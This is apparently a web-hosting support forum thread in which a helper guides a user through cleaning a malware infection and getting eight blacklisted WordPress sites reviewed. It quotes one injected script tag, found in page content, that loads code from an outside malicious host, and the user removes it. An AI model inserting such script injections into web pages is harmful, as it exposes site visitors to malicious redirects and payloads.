still can’t find the issue

Sucuri is saying “MW:BLK:2” is my issue but i can’t find anything of the sort in any of my files. i found another thread where you explained that its a generic term and you gave a script example but i couldn’t find that code in anthying either. i’m really at a loss here and i have 8 websites that are ALL down… if anyone can help em i would greatly appreciate it.

I sounds like you may have already removed the threats but your sites are still blacklisted. If Sucuri is only saying “MW:BLK:2” that means they cannot find any more threats either, but your site is still on a blacklist and it may stay there a while unless you Request a Review.

Start by logging into your Google Webmaster Tools account for those sites or create an account if you don’t have one. Then check the Security or Malware section and Request a Review.

i’ve requested a review 3 times but still says it’s infected.

What are the dates listed on the URLs that are still infected? When did you first Request a Review?

ya, the 13th, then the 14th, then the 15th

Which of my last two questions are you answering with that list of date?

If those are the date on the malicious URL found then that is great news, you just need to wait for you review to go through.

If those are the date that you requested reviews, then what are the dates listed on the URLs that are still infected?

i’ve asked for a review on all those dates and gotten a response a few hours later saying the sites have “failed”.

Can you post the details of that report so that I can see what threats they are referring to and check the URLs listed?

OK so the details don’t show anything. has all the standard “Malware, this is what you need to do” text… then below all that it says “examples” and gives my website address. https://blacksagestudio.com/

this is the same for all of my websites

I’ve now got the plugin installed from my root and ran it over the entire server and it found more errors so i clean them all out. I did another review on google and i’m getting the same reply as above. i ran the plugin again and it returned 100% ok.

my next step will be to re-install ALL my wordpress installations but i really don’t want to go there if i don’t have to.

have you had a change to look at it?

have you had a chance to check out the website?

I don’t think there is any more malicious PHP code on this site but it does look like there was some HTML added to the bottom of your page content. Edit the home page of that site, on the “text” tab you should see this script link at the bottom of the page:
<script type="text/javascript" src="https://www.hcifx.com/troyengelhardt/index1261.php"></script>
Take that out and request another review (if Webmaster Tool lists any other pages you may want to check the content of those as well).

OK so i’ve removed all that code (holy shit was it in EVERYTHING) and all my sites went live again (thank you). yesterday google reported these two pages as malicious again and i can’t find the issues anywhere… I scanned the site and all clear.

can you take a look for me?

https://unityofnoise.com/artists/
https://unityofnoise.com/catalog/

Google says that those pages redirect visitors to hcifx . com but I don’t see it, it could have been cached by them, what are the dates on those two URLs listed as?

You can try “Fetch as Googlebot” from you Webmaster Tools account. If you don’t see it there then just request another review.